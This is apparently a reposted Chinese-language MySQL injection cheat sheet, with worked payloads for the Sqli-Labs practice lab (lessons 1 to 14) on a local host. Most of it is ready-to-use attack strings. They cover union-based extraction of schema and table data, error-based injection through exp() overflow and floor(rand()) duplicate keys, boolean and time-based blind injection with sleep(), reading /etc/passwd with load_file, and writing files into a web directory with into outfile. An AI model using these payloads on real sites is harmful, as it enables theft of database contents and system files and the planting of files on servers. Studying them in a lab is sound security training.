Mysql注入备忘

mysql注入中常用到的函数

database()查询当前数据库

current_user()查询当前用户

@@datadir查询数据库路径

@@version_compile_os查询操作系统版本

version()查询数据库版本

concat_ws(separator,str1, str2)含有分割符连接字符串

concat_ws(0x3a, version(), user(), database())

group_concat()含有分割符连接字段

group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [Separator ‘分隔符‘])

group_concat(distinct table_schema)

mysql注释符

#,  -- ,  /*  */,  注意--的后面还有一个空格

 

mysql的又一种报错注入

select * from users where username=admin and exp(~(select*from (select user())a));

-- output
ERROR 1690 (22003): DOUBLE value is out of range in exp(~((select root@localhost from dual)))

Less-1实例

http://127.0.0.1/sqli/Less-1/?id=1 and exp(~(select*from(select user())a)) --+

-- output
DOUBLE value is out of range in exp(~((select root@localhost from dual)))

 

 

常规报错注入

and 0 union select 1, group_concat(distinct table_schema), 3 from information_schema.columns --+  爆库

and 0 union select 1, group_concat(distinct table_name), 3 from information_schema.columns where table_schema = 要爆库名的hex --+

and 0 union select 1, group_concat(distinct column_name), 3 from information_schema.columns where table_name = 要爆表名的hex --+

and 0 union select 1, group_concat(column1, 0x3a, column2), 3 from table_name --+

 

Sqli-Labs

Less-1  字符型

http://127.0.0.1/sqli/Less-1/?id=1 and all union select 1,2,3 --+

Less-2  数字型

http://127.0.0.1/sqli/Less-2/?id=1 and all union select 1,2,3 --+

Less-3/4  字符型,有括号,3和4只是单引号和双引号问题。

-- 关键代码
-- Less-3
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
-- ‘)闭合括号和单引号即可
http://127.0.0.1/sqli/Less-3/?id=-1) union all select 1,2,3--+

 

双查询注入

 有时候并不会返回错误,需要多刷几次

 select concat(0x3a,0x3a,(select version()), 0x3a,0x3a);
-- ::10.0.13-MariaDB::

select concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand()*2));
-- ::10.0.13-MariaDB::1/0

select concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand()*2))a from security.users;
-- 表中有多少列就显示出多少条::10.0.13-MariaDB::1/0

select concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a;
-- ::10.0.13-MariaDB::1
-- ::10.0.13-MariaDB::0

select count(*), concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand(0)*2))a from information_schema.tables group by a;
-- ERROR 1062 (23000): Duplicate entry ‘::10.0.13-MariaDB::1‘ for key ‘group_key‘

-- 模式
union select 字段数 from (select count(*), concat(0x3a,0x3a,(查询语句),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b --+

 

Less-5/6

-- Less-5
http://127.0.0.1/sqli/Less-5/?id=1 union select 1,2,3 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b --+
-- Less-6
http://127.0.0.1/sqli/Less-6/?id=1" union select 1,2,3 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b --+

 

Load_file && into outfile && dumpfile

select * from emails into outfile "/tmp/test.txt";

select * from emails limit 0,1 into dumpfile "test1.txt";

select load_file("/etc/passwd");

Less-7

http://127.0.0.1/sqli/Less-7/?id=1)) union select 1,2,version() into outfile "/srv/www/htdocs/sqli/Less-7/test11.txt"--+

 

Less-8  布尔型盲注

http://127.0.0.1/sqli/Less-8/?id=1 and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1))) =101--+

 

Less-9/10 基于时间的盲注

在mysql中一般是用sleep()函数将查询暂停数秒,对于没有sleep()的可以用benchmark()函数。

一般模式,配合ascii,substr,和if语句来查询:

 union select if(ascii(substr((查询语句),i,1)) > k, sleep(10), null) --+
 and if((select substr((查询语句), i, 1))=xxx, sleep(10), null) --+

-- Less-9
 and IF((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0,1)=e, sleep(5), null) --+

-- Less-10
" and IF((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0,1)=e, sleep(5), null) --+

 

Less-11/12  有回显的POST注入,和Less-1/2差不多。

-- POST的数据
-- Less-11
uname=1&passwd=1 union select 1,group_concat(distinct table_name) from information_schema.tables where table_schema=database() #

-- Less-12
uname=1&passwd=1") union select 1,group_concat(distinct table_name) from information_schema.tables where table_schema=database() #

 

 Less-13/14  POST双查询注入

-- Less-13
uname=1&passwd=1) union select 1,2 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b #
-- Less-14
uname=1&passwd=1" union select 1,2 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b #

 

 

 

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。